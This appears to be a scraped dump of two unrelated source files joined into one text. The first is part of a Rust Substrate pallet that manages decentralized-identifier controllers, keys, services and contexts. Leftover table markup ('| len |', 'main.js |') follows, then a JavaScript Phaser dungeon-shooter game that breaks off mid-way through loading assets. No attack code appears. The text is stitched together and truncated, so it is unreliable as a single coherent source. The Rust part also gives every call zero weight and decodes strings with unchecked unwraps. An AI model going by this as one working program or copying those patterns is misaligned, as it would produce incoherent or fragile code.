pub fn add_controller(origin, did: Vec<u8>, controller: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let controller_list = ControllerStore::get(&did);
ensure!(!controller_list.contains(&controller), Error::<T>::ControllerExist);
ControllerStore::mutate(&did, |c| c.push(controller.clone()));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::AddController(did, controller));
Ok(())
}
#[weight = 0]
pub fn remove_controller(origin, did: Vec<u8>, controller: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let controller_list = ControllerStore::get(&did);
ensure!(controller_list.contains(&controller), Error::<T>::ControllerNotExist);
let index = controller_list
.iter()
.position(|x| x == &controller)
.unwrap();
ControllerStore::mutate(&did, |c| c.remove(index));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::RemoveController(did, controller));
Ok(())
}
#[weight = 0]
pub fn add_key(origin, did: Vec<u8>, key: T::AccountId, controller: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let account_id_list = <PkListStore<T>>::get(&did);
ensure!(!account_id_list.contains(&key), Error::<T>::AccountIdExist);
<PkListStore<T>>::mutate(&did, |c| c.push(Pk::<T::AccountId>::new_acc(controller.clone(), key.clone())));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::AddKey(did, key, controller));
Ok(())
}
#[weight = 0]
pub fn deactivate_key(origin, did: Vec<u8>, key: T::AccountId) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let account_id_list = <PkListStore<T>>::get(&did);
ensure!(account_id_list.contains(&key), Error::<T>::AccountIdNotExist);
<PkListStore<T>>::mutate(&did, |c| c.deactivate_acc(&key));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::DeactivateKey(did, key));
Ok(())
}
#[weight = 0]
pub fn add_new_auth_key(origin, did: Vec<u8>, key: T::AccountId, controller: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let account_id_list = <PkListStore<T>>::get(&did);
ensure!(!account_id_list.contains(&key), Error::<T>::AccountIdExist);
<PkListStore<T>>::mutate(&did, |c| c.push(Pk::<T::AccountId>::new_acc(controller.clone(), key.clone())));
			// `account_id_list` was read before the push, so its length is the index of the key that was just added.
			let index: u32 = account_id_list.len() as u32;
AuthenticationStore::mutate(&did, |c| c.push(index));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::AddNewAuthKey(did, key, controller));
Ok(())
}
#[weight = 0]
pub fn set_auth_key(origin, did: Vec<u8>, key: T::AccountId) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let account_id_list = <PkListStore<T>>::get(&did);
let index = account_id_list.find_acc(&key);
ensure!(index.is_some(), Error::<T>::AccountIdNotExist);
<PkListStore<T>>::mutate(&did, |c| c.set_acc_auth(&key));
AuthenticationStore::mutate(&did, |c| c.push(index.unwrap()));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::SetAuthKey(did, key));
Ok(())
}
#[weight = 0]
pub fn deactivate_auth_key(origin, did: Vec<u8>, key: T::AccountId) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let account_id_list = <PkListStore<T>>::get(&did);
let authentication_list = AuthenticationStore::get(&did);
let index = account_id_list.find_acc(&key);
ensure!(index.is_some(), Error::<T>::AccountIdNotExist);
<PkListStore<T>>::mutate(&did, |c| c.remove_acc_auth(&key));
let i = authentication_list
.iter()
.position(|x| x == &(index.unwrap() as u32))
.unwrap();
AuthenticationStore::mutate(&did, |c| c.remove(i));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::DeactivateAuthKey(did, key));
Ok(())
}
#[weight = 0]
pub fn add_new_auth_key_by_controller(origin, did: Vec<u8>, key: T::AccountId, pk_controller: Vec<u8>, controller: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
let controller_list = ControllerStore::get(&did);
ensure!(controller_list.contains(&controller), Error::<T>::ControllerNotExist);
Self::check_access(&controller, &sender)?;
let account_id_list = <PkListStore<T>>::get(&did);
ensure!(!account_id_list.have_access(&key), Error::<T>::AccountIdExist);
<PkListStore<T>>::mutate(&did, |c| c.push(Pk::<T::AccountId>::new_acc(controller.clone(), key.clone())));
			// `account_id_list` was read before the push, so its length is the index of the key that was just added.
			let index: u32 = account_id_list.len() as u32;
AuthenticationStore::mutate(&did, |c| c.push(index));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::AddNewAuthKeyByController(did, key, controller));
Ok(())
}
#[weight = 0]
pub fn set_auth_key_by_controller(origin, did: Vec<u8>, key: T::AccountId, controller: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
let controller_list = ControllerStore::get(&did);
ensure!(controller_list.contains(&controller), Error::<T>::ControllerNotExist);
Self::check_access(&controller, &sender)?;
let account_id_list = <PkListStore<T>>::get(&did);
let index = account_id_list.find_acc(&key);
ensure!(index.is_some(), Error::<T>::AccountIdNotExist);
<PkListStore<T>>::mutate(&did, |c| c.set_acc_auth(&key));
AuthenticationStore::mutate(&did, |c| c.push(index.unwrap()));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::SetAuthKeyByController(did, key));
Ok(())
}
#[weight = 0]
pub fn deactivate_auth_key_by_controller(origin, did: Vec<u8>, key: T::AccountId, controller: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
let controller_list = ControllerStore::get(&did);
ensure!(controller_list.contains(&controller), Error::<T>::ControllerNotExist);
Self::check_access(&controller, &sender)?;
let account_id_list = <PkListStore<T>>::get(&did);
let authentication_list = AuthenticationStore::get(&did);
let index = account_id_list.find_acc(&key);
ensure!(index.is_some(), Error::<T>::AccountIdNotExist);
<PkListStore<T>>::mutate(&did, |c| c.remove_acc_auth(&key));
let i = authentication_list
.iter()
.position(|x| x == &(index.unwrap() as u32))
.unwrap();
AuthenticationStore::mutate(&did, |c| c.remove(i));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::DeactivateAuthKeyByController(did, key));
Ok(())
}
#[weight = 0]
pub fn add_service(origin, did: Vec<u8>, service_id: Vec<u8>, service_type: Vec<u8>, endpoint: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let ser = Service {
id: service_id.clone(),
tp: service_type.clone(),
service_endpoint: endpoint.clone(),
};
let service_list = ServiceStore::get(&did);
let index = service_list.iter().position(|x| &x.id == &ser.id);
ensure!(index.is_none(), Error::<T>::ServiceExist);
ServiceStore::mutate(&did, |c| c.push(ser));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::AddService(did, service_id, service_type, endpoint));
Ok(())
}
#[weight = 0]
pub fn update_service(origin, did: Vec<u8>, service_id: Vec<u8>, service_type: Vec<u8>, endpoint: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let service_list = ServiceStore::get(&did);
let index = service_list.iter().position(|x| &x.id == &service_id);
ensure!(index.is_some(), Error::<T>::ServiceNotExist);
ServiceStore::mutate(&did, |c| {
let ser = c.get_mut(index.unwrap()).unwrap();
ser.id = service_id.clone();
ser.tp = service_type.clone();
ser.service_endpoint = endpoint.clone();
});
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::UpdateService(did, service_id, service_type, endpoint));
Ok(())
}
#[weight = 0]
pub fn remove_service(origin, did: Vec<u8>, service_id: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let service_list = ServiceStore::get(&did);
let index = service_list.iter().position(|x| &x.id == &service_id);
ensure!(index.is_some(), Error::<T>::ServiceNotExist);
ServiceStore::mutate(&did, |c| c.remove(index.unwrap()));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::RemoveService(did, service_id));
Ok(())
}
#[weight = 0]
pub fn add_context(origin, did: Vec<u8>, context: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let context_list = ContextStore::get(&did);
ensure!(!context_list.contains(&context), Error::<T>::ContextExist);
ContextStore::mutate(&did, |c| c.push(context.clone()));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::AddContext(did, context));
Ok(())
}
#[weight = 0]
pub fn remove_context(origin, did: Vec<u8>, context: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let context_list = ContextStore::get(&did);
ensure!(context_list.contains(&context), Error::<T>::ContextNotExist);
let index = context_list.iter().position(|x| *x == context);
ContextStore::mutate(&did, |c| c.remove(index.unwrap()));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::RemoveContext(did, context));
Ok(())
}
#[weight = 0]
pub fn verify_signature(origin, did: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
Self::deposit_event(RawEvent::VerifySignature(did));
Ok(())
}
#[weight = 0]
pub fn verify_controller(origin, did: Vec<u8>, controller: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
let controller_list = ControllerStore::get(&did);
ensure!(controller_list.contains(&controller), Error::<T>::ControllerNotExist);
Self::check_access(&controller, &sender)?;
Self::deposit_event(RawEvent::VerifyController(did, controller));
Ok(())
}
}
}
impl<T: Trait> Module<T> {
pub fn check_did_status(did: &Vec<u8>) -> dispatch::DispatchResult {
ensure!(StatusStore::contains_key(did), Error::<T>::NotRegistered);
if StatusStore::get(did) != VALID {
Err(Error::<T>::Invalid.into())
} else {
Ok(())
}
}
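	/// A caller has access to a DID when its account appears in the DID's key list
	/// (the check itself is delegated to `PkList::have_access`).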
pub fn check_access(did: &Vec<u8>, caller: &T::AccountId) -> dispatch::DispatchResult {
let pk_list = <PkListStore<T>>::get(did);
ensure!(pk_list.have_access(caller), Error::<T>::NoAccess);
Ok(())
}
}
impl<T> Module<T>
where
T: Trait,
<T as frame_system::Trait>::AccountId: core::convert::AsRef<[u8]> {
pub fn get_document(did: Vec<u8>) -> Option<Document<T::Moment>> {
let id = str::from_utf8(&did).ok().unwrap();
let pk_list = <PkListStore<T>>::get(&did);
let pk_list_json = pk_list.to_json(&did);
let authentication_list = AuthenticationStore::get(&did);
let authentication_json = pk_list.to_authentication_json(&did, authentication_list);
let context_list = ContextStore::get(&did);
let mut contexts_json = Vec::new();
for v in context_list.iter() {
let s = str::from_utf8(&v).ok().unwrap().to_string();
contexts_json.push(s);
}
let controller_list = ControllerStore::get(&did);
let mut controller_json = Vec::new();
for v in controller_list.iter() {
let s = str::from_utf8(&v).ok().unwrap().to_string();
controller_json.push(s);
}
let service_list = ServiceStore::get(&did);
let mut service_json = Vec::new();
for v in service_list.iter() {
service_json.push(v.to_json());
}
let created = <CreatedStore<T>>::get(&did);
let updated = <UpdatedStore<T>>::get(&did);
let document = Document {
id: id.to_string(),
public_key: pk_list_json,
authentication: authentication_json,
contexts: contexts_json,
controller: controller_json,
service: service_json,
created,
updated,
};
Some(document)
}
}
| len |
main.js | function Grunt(index, game, player, bullets, x, y) {
this.game = game;
this.player = player;
this.bullets = bullets;
this.health = 3;
this.fireRate = 1000;
this.nextFire = 0;
this.alive = true;
this.grunt = game.add.sprite(x, y, 'grunt');
this.grunt.anchor.setTo(0.5);
this.grunt.animations.add('draw');
this.grunt.animations.play('draw', 15, true);
this.grunt.name = index;
game.physics.enable(this.grunt, Phaser.Physics.ARCADE);
}
Grunt.prototype.damage = function() {
this.health -= playerDamage;
if (this.health <= 0) {
this.alive = false;
//this.grunt.kill();
return true;
}
return false;
};
Grunt.prototype.update = function(player, enemies) {
this.player = player;
var distance = this.game.physics.arcade.distanceBetween(this.grunt, this.player);
if (distance < 300) {
//approach the player without stepping into other grunts
var approachAng = this.game.math.angleBetween(this.grunt.x, this.grunt.y, this.player.x, this.player.y);
var avoidDist = 150; //closest allowed to get to other enemies
var minDist = 150; //closest allowed to get to player
var avoidAngle = 0;
for (var i = 0; i < enemies.length; i++) {
            if (this.grunt == enemies[i].grunt)
                continue; //skip self and keep checking the remaining grunts
if (avoidAngle !== 0)
break;
var dist = this.game.physics.arcade.distanceBetween(this.grunt, enemies[i].grunt);
if (dist < avoidDist) {
                avoidAngle = Math.PI / 2;
                if (Phaser.Utils.chanceRoll(50))
                    avoidAngle *= -1; //dodge to the other side half of the time
}
}
approachAng += avoidAngle;
if (distance > minDist) {
this.grunt.body.velocity.x = Math.cos(approachAng) * 125;
this.grunt.body.velocity.y = Math.sin(approachAng) * 125;
}
else {
this.grunt.body.velocity.setTo(0, 0);
}
//shoot the bullets
if (this.game.time.now > this.nextFire && this.bullets.countDead() > 0 && isPlayerAlive) {
this.nextFire = this.game.time.now + this.fireRate;
var bullet = this.bullets.getFirstDead();
bullet.reset(this.grunt.x, this.grunt.y);
bullet.animations.add('draw');
bullet.play('draw', 15, true);
bullet.rotation = this.game.physics.arcade.moveToObject(bullet, this.player, 500);
game.sound.play('bullet-fire', sfxVol);
}
}
};
var game = new Phaser.Game(800, 600, Phaser.AUTO, '');
var sfxVol = 1;
var musicVol = 1;
var health = 8;
var playerFireRate = 1000;
var playerNextFire = 0;
var playerDamage = 1;
var playerTransformations = [];
var currentTransformation = 'player_square';
var playerItems = [];
var isPlayerAlive = true;
var isInvulnerable = false;
var currentLevel = 0;
var MIN_FIRE_RATE = 100;
var MAX_DAMAGE = 4;
var MAX_HEALTH = 8;
function reset() {
health = 8;
playerFireRate = 1000;
playerNextFire = 0;
playerDamage = 1;
playerTransformations = [];
playerItems = [];
isPlayerAlive = true;
isInvulnerable = false;
currentLevel = 0;
game.state.start('Game');
}
function advance() {
isInvulnerable = false;
currentLevel++;
game.state.start('Game');
}
var Dungeon = {
//Dungeon creation algorithm based off of https://github.com/plissken2013es/phaserRandomDungeon
create: function() {
game.physics.startSystem(Phaser.Physics.ARCADE);
game.world.setBounds(0, 0, 4200, 4200);
game.physics.arcade.sortDirection = Phaser.Physics.Arcade.SORT_NONE;
this.erase = game.sound.add('erase', sfxVol);
this.keyboard = game.input.keyboard;
this.walls = game.add.group();
this.walls.enableBody = true;
this.walls.physicsBodyType = Phaser.Physics.ARCADE;
this.floors = game.add.group();
this.items = game.add.group();
this.room_max = 8;
this.room_min = 4;
this.max_rooms = this.rand(8, 16);
this.roomCenters = [];
this.roomCoords = [];
this.rooms = [];
this.lastRoom = {
x: 0,
y: 0
};
this.numRooms = 0;
        this.exit = game.add.sprite(0, 0, 'exit'); //repositioned to the last room's centre in populate()
this.exit.anchor.setTo(0.5);
this.exit.animations.add('draw');
this.exit.animations.play('draw', 15, true);
game.physics.arcade.enable(this.exit);
this.enemyBullets = game.add.group();
this.enemyBullets.enableBody = true;
this.enemyBullets.physicsBodyType = Phaser.Physics.ARCADE;
this.enemyBullets.createMultiple(100, 'enemy-bullet');
this.enemyBullets.setAll('anchor.x', 0.5);
this.enemyBullets.setAll('anchor.y', 0.5);
this.enemyBullets.setAll('outOfBoundsKill', true);
this.enemyBullets.setAll('checkWorldBounds', true);
this.bullets = game.add.group();
this.bullets.enableBody = true;
this.bullets.physicsBodyType = Phaser.Physics.ARCADE;
this.bullets.createMultiple(100, 'bullet');
this.bullets.setAll('anchor.x', 0.5);
this.bullets.setAll('anchor.y', 0.5);
this.bullets.setAll('outOfBoundsKill', true);
this.bullets.setAll('checkWorldBounds', true);
this.player = {};
this.enemies = [];
this.enemiesTotal = this.rand(12, 25);
        this.enemiesAlive = 0;
this.itemsTotal = this.rand(8, 12);
this.makeMap();
this.populate();
this.enemiesAlive = this.enemies.length;
this.player = game.add.sprite(this.player.x, this.player.y, currentTransformation);
this.player.animations.add('draw', [0, 1, 2, 3, 99]); //player's idle animation after having changed
this.player.animations.add('change', Phaser.ArrayUtils.numberArrayStep(4, 100)); //player animation for transformation
this.player.animations.add('erase', Phaser.ArrayUtils.numberArrayStep(99, 115)); //player's death animation
this.player.animations.play('draw', 15, true);
this.player.anchor.setTo(0.5);
game.physics.arcade.enable(this.player);
this.player.body.setSize(70, 70);
        this.healthPos = MAX_HEALTH - health;
this.healthUI = game.add.sprite(50, 50, 'health', this.healthPos);
this.healthUI.fixedToCamera = true;
this.damagenotif = game.add.sprite(game.world.centerX, game.world.centerY + 150, 'damagenotif');
this.frnotif = game.add.sprite(game.world.centerX, game.world.centerY + 150, 'frnotif');
this.damagenotif.fixedToCamera = true;
this.frnotif.fixedToCamera = true;
this.damagenotif.kill();
this.frnotif.kill();
game.camera.follow(this.player, Phaser.Camera.FOLLOW_TOPDOWN_TIGHT);
},
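    //returns a random integer in [min, max); the upper bound is exclusive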
rand: function(min, max) {
return Math.floor(Math.random() * (max - min)) + min;
},
populate: function() {
//fill map with enemies
var entityMap = [];
this.exit.x = this.roomCenters[this.numRooms - 1].x;
this.exit.y = this.roomCenters[this.numRooms - 1].y;
entityMap.push({
x: this.exit.x,
y: this.exit.y
});
for (var i = 0; i < this.enemiesTotal; i++) {
var randIndex = this.rand(0, this.roomCoords.length - 1);
var randX = this.roomCoords[randIndex].x + 50;
var randY = this.roomCoords[randIndex].y + 50;
while (this.roomCoords[randIndex].room === 0) {
randIndex = this.rand(1, this.roomCoords.length - 1);
randX = this.roomCoords[randIndex].x + 50;
randY = this.roomCoords[randIndex].y + 50;
}
if (entityMap.length > 0) {
for (var j = 0; j < entityMap.length; j++) {
if (randX === entityMap[j].x && randY === entityMap[j].y) {
randIndex = this.rand(1, this.roomCoords.length - 1);
randX = this.roomCoords[randIndex].x + 50;
randY = this.roomCoords[randIndex].y + 50;
}
}
}
this.enemies.push(new Grunt(i, game, this.player, this.enemyBullets, randX, randY));
game.physics.arcade.overlap(this.enemies[i].grunt, this.walls, function(grunt, wall) {
grunt.x -= wall.body.overlapX;
grunt.y -= wall.body.overlapY;
});
entityMap.push({
x: this.enemies[i].grunt.x,
y: this.enemies[i].grunt.y
});
}
//fill map with items
for (var i = 0; i < this.itemsTotal; i++) {
var item;
var randIndex = this.rand(0, this.roomCoords.length - 1);
var randX = this.roomCoords[randIndex].x + 50;
var randY = this.roomCoords[randIndex].y + 50;
while (this.roomCoords[randIndex].room === 0) {
randIndex = this.rand(1, this.roomCoords.length - 1);
randX = this.roomCoords[randIndex].x + 50;
randY = this.roomCoords[randIndex].y + 50;
}
if (entityMap.length > 0) {
for (var j = 0; j < entityMap.length; j++) {
if (randX === entityMap[j].x && randY === entityMap[j].y) {
randIndex = this.rand(1, this.roomCoords.length - 1);
randX = this.roomCoords[randIndex].x + 50;
randY = this.roomCoords[randIndex].y + 50;
}
}
}
if (Phaser.Utils.chanceRoll(50)) {
item = this.items.create(randX, randY, 'damageIncrease');
}
else {
item = this.items.create(randX, randY, 'fireRateUp');
}
game.physics.arcade.enable(item);
}
},
// Room: function(x, y, w, h) {
// this.x1 = x;
// this.y1 = y;
// this.x2 = x + w;
// this.y2 = y + h;
// var center_x = (this.x1 + this.x2) / 2;
// var center_y = (this.y1 + this.y2) / 2;
// this.center_coords = {
// x: center_x,
// y: center_y
// };
// },
createFloor: function(x, y) {
var fl = this.floors.create(x, y, 'floor');
game.physics.arcade.enable(fl);
game.physics.arcade.overlap(fl, this.walls, function(floor, wall) {
wall.destroy();
});
},
createRoom: function(x1, x2, y1, y2, roomNum) {
for (var x = x1; x < x2; x += 100) {
for (var y = y1; y < y2; y += 100) {
this.createFloor(x, y);
this.roomCoords.push({
x: x,
y: y,
room: roomNum
});
}
}
},
createHTunnel: function(x1, x2, y) {
var min = Math.min(x1, x2);
var max = Math.max(x1, x2);
for (var x = min; x < max + 100; x += 100) {
this.createFloor(x, y);
}
},
createVTunnel: function(y1, y2, x) {
var min = Math.min(y1, y2);
var max = Math.max(y1, y2);
for (var y = min; y < max + 100; y += 100) {
this.createFloor(x, y);
}
},
makeMap: function() {
//fill the world with walls
for (var y = 0; y < game.world.height; y += 100) {
for (var x = 0; x < game.world.width; x += 100) {
var wall = this.walls.create(x, y, 'wall');
wall.body.immovable = true;
wall.animations.add('draw');
wall.play('draw', 15, true);
}
}
//carving out the rooms
for (var r = 0; r < this.max_rooms; r++) {
var w = this.rand(this.room_min, this.room_max) * 100;
var h = this.rand(this.room_min, this.room_max) * 100;
x = this.rand(1, ((game.world.width / 100) - (w / 100 + 1))) * 100;
y = this.rand(1, ((game.world.height / 100) - (h / 100 + 1))) * 100;
this.createRoom(x, x + w, y, y + h, this.numRooms);
if (this.numRooms === 0) {
this.player.x = x + (w / 2);
this.player.y = y + (h / 2);
}
else {
var new_x = game.math.snapToFloor(x + (w / 2), 100);
var new_y = game.math.snapToFloor(y + (h / 2), 100);
var prev_x = game.math.snapToFloor(this.lastRoom.x, 100);
var prev_y = game.math.snapToFloor(this.lastRoom.y, 100);
this.createHTunnel(prev_x, new_x, prev_y);
this.createVTunnel(prev_y, new_y, new_x);
}
this.lastRoom = {
x: x + (w / 2),
y: y + (h / 2)
};
this.roomCenters.push(this.lastRoom);
this.numRooms++;
}
},
update: function() {
this.game.physics.arcade.TILE_BIAS = 40;
game.physics.arcade.collide(this.walls, this.player);
game.physics.arcade.overlap(this.player, this.items, this.itemsHandler, null, this);
game.physics.arcade.overlap(this.enemyBullets, this.player, this.bulletHitPlayer, null, this);
game.physics.arcade.overlap(this.exit, this.player, this.exitLevel, null, this);
game.physics.arcade.overlap(this.enemyBullets, this.walls, this.bulletHitWall, null, this);
game.physics.arcade.overlap(this.bullets, this.walls, this.bulletHitWall, null, this);
for (var i = 0; i < this.enemies.length; i++) {
if (this.enemies[i].alive) {
game.physics.arcade.collide(this.player, this.enemies[i].grunt);
game.physics.arcade.collide(this.enemies[i].grunt, this.walls);
game.physics.arcade.overlap(this.bullets, this.enemies[i].grunt, this.bulletHitEnemy, null, this);
game.physics.arcade.overlap(this.enemies[i].grunt, this.walls, function(grunt, wall) {
grunt.x -= wall.body.overlapX;
grunt.y -= wall.body.overlapY;
});
this.enemies[i].update(this.player, this.enemies);
}
else {
this.enemiesAlive--;
}
}
//set horizontal movement to left and right arrow keys
if (isPlayerAlive){
if (this.keyboard.isDown(Phaser.KeyCode.LEFT)) {
this.player.body.velocity.x = -175;
}
else if (this.keyboard.isDown(Phaser.KeyCode.RIGHT)) {
this.player.body.velocity.x = 175;
}
else {
this.player.body.velocity.x = 0;
}
//set vertical movement to up and down arrow keys
if (this.keyboard.isDown(Phaser.KeyCode.UP)) {
this.player.body.velocity.y = -175;
}
else if (this.keyboard.isDown(Phaser.KeyCode.DOWN)) {
this.player.body.velocity.y = 175;
}
else {
this.player.body.velocity.y = 0;
}
            //fire a bullet toward the pointer while the mouse button is held
if (game.input.activePointer.isDown) {
if (game.time.now > playerNextFire && this.bullets.countDead() > 0) {
playerNextFire = game.time.now + playerFireRate;
var bullet = this.bullets.getFirstDead();
bullet.reset(this.player.x, this.player.y);
bullet.animations.add('draw');
bullet.play('draw', 15, true);
bullet.rotation = this.game.physics.arcade.moveToPointer(bullet, 500);
game.sound.play('bullet-fire', sfxVol);
}
}
}
},
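    //enemy.name was set to the grunt's index in the Grunt constructor, so it doubles as a lookup into this.enemies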
bulletHitEnemy: function(enemy, bullet) {
bullet.kill();
var destroyed = this.enemies[enemy.name].damage();
if (destroyed) {
//TODO add death animation
if (Phaser.Utils.chanceRoll(25)) {
var item = this.items.create(enemy.x, enemy.y, 'healthup');
game.physics.arcade.enable(item);
}
enemy.kill();
}
},
bulletHitPlayer: function(player, bullet) {
bullet.kill();
        //reduce health unless the player is currently invulnerable
if (!isInvulnerable) {
health -= 1;
this.healthUI.frame++;
}
if (health <= 0) {
isPlayerAlive = false;
isInvulnerable = true;
game.physics.arcade.isPaused = true;
this.erase.play();
player.play('erase', 15, false, true);
game.physics.arcade.isPaused = false;
this.erase.onStop.add(function(sound) {
game.state.start('GameOver');
});
}
},
bulletHitWall: function(bullet, wall) {
bullet.kill();
},
exitLevel: function(exit, player) {
isInvulnerable = true;
this.erase.play();
player.play('erase', 15, false, true);
this.erase.onStop.add(function(sound) {
game.state.start('Complete');
});
},
itemsHandler: function(player, item) {
if (item.key === 'damageIncrease' && playerDamage < MAX_DAMAGE) {
playerDamage += .5;
if(this.frnotif.alive){
this.frnotif.kill();
}
if(!this.damagenotif.alive){
this.damagenotif.revive();
                game.time.events.add(2000, this.damagenotif.kill, this.damagenotif); //pass the sprite as context so kill() acts on it
}
}
else if (item.key === 'fireRateUp' && playerFireRate > MIN_FIRE_RATE) {
playerFireRate /= 2;
if(this.damagenotif.alive){
this.damagenotif.kill();
}
if(!this.frnotif.alive){
this.frnotif.revive();
                game.time.events.add(2000, this.frnotif.kill, this.frnotif); //pass the sprite as context so kill() acts on it
}
}
else if (item.key === 'healthup' && health < MAX_HEALTH) {
health++;
this.healthUI.frame--;
}
item.kill();
}
};
var GameOverState = {
create: function() {
game.world.setBounds(0, 0, 800, 600);
this.floors = game.add.group();
for (var y = 0; y < game.world.height; y += 100) {
for (var x = 0; x < game.world.width; x += 100) {
this.floors.create(x, y, 'floor');
}
}
this.title = game.add.sprite(game.world.centerX, 60, 'youdied');
this.title.anchor.setTo(0.5);
this.title.animations.add('jitter');
this.title.play('jitter', 15, true);
this.tryagain = game.add.button(game.world.centerX, game.world.centerY, 'tryagain', reset, this);
this.tryagain.anchor.setTo(0.5);
this.tryagain.animations.add('jitter');
},
update: function() {
this.tryagain.events.onInputOver.add(function(button, cursor) {
button.play('jitter', 15, true);
});
this.tryagain.events.onInputOut.add(function(button, cursor) {
button.animations.stop('jitter');
});
}
};
var MainMenuState = {
create: function() {
game.world.setBounds(0, 0, 800, 600);
this.floors = game.add.group();
for (var y = 0; y < game.world.height; y += 100) {
for (var x = 0; x < game.world.width; x += 100) {
this.floors.create(x, y, 'floor');
}
}
this.title = game.add.sprite(game.world.centerX, 60, 'title');
this.title.anchor.setTo(0.5);
this.title.animations.add('jitter');
this.title.play('jitter', 15, true);
this.start = game.add.button(game.world.centerX, game.world.centerY, 'start', reset, this);
this.start.anchor.setTo(0.5);
this.start.animations.add('jitter');
},
update: function() {
this.start.events.onInputOver.add(function(button, cursor) {
button.play('jitter', 15, true);
});
this.start.events.onInputOut.add(function(button, cursor) {
button.animations.stop('jitter');
});
}
};
var CompletedState = {
create: function() {
game.world.setBounds(0, 0, 800, 600);
this.floors = game.add.group();
for (var y = 0; y < game.world.height; y += 100) {
for (var x = 0; x < game.world.width; x += 100) {
this.floors.create(x, y, 'floor');
}
}
this.title = game.add.sprite(game.world.centerX, 60, 'levelcomplete');
this.title.anchor.setTo(0.5);
this.title.animations.add('jitter');
this.title.play('jitter', 15, true);
this.start = game.add.button(game.world.centerX, game.world.centerY, 'start', advance, this);
this.start.anchor.setTo(0.5);
this.start.animations.add('jitter');
},
update: function() {
this.start.events.onInputOver.add(function(button, cursor) {
button.play('jitter', 15, true);
});
this.start.events.onInputOut.add(function(button, cursor) {
button.animations.stop('jitter');
});
}
};
var BootState = {
preload: function() {
game.load.bitmapFont('baskerville', './assets/baskerville_0.png', './assets/baskerville.xml');
game.load.spritesheet('title', './assets/title.png', 401, 121);
game.load.spritesheet('tryagain', './assets/tryagain.png', 288, 121);
game.load.spritesheet('start', './assets/start.png', 288, 121);
game.load.spritesheet('options', './assets/options.png', 288, 121);
},
create: function() {
game.state.start('Load');
}
};
var LoadState = {
preload: function() {
var loadLabel = game.add.bitmapText(80, 150, 'baskerville', 'Loading...', 32);
game.load.spritesheet('player_square', './assets/player_square.png', 70, 70);
game.load.spritesheet('wall', './assets/wall_scribble.png', 100, 100);
game.load.image('floor', './assets/floor_graph.png');
game.load.spritesheet('bullet', './assets/player_bullet.png', 16, 16);
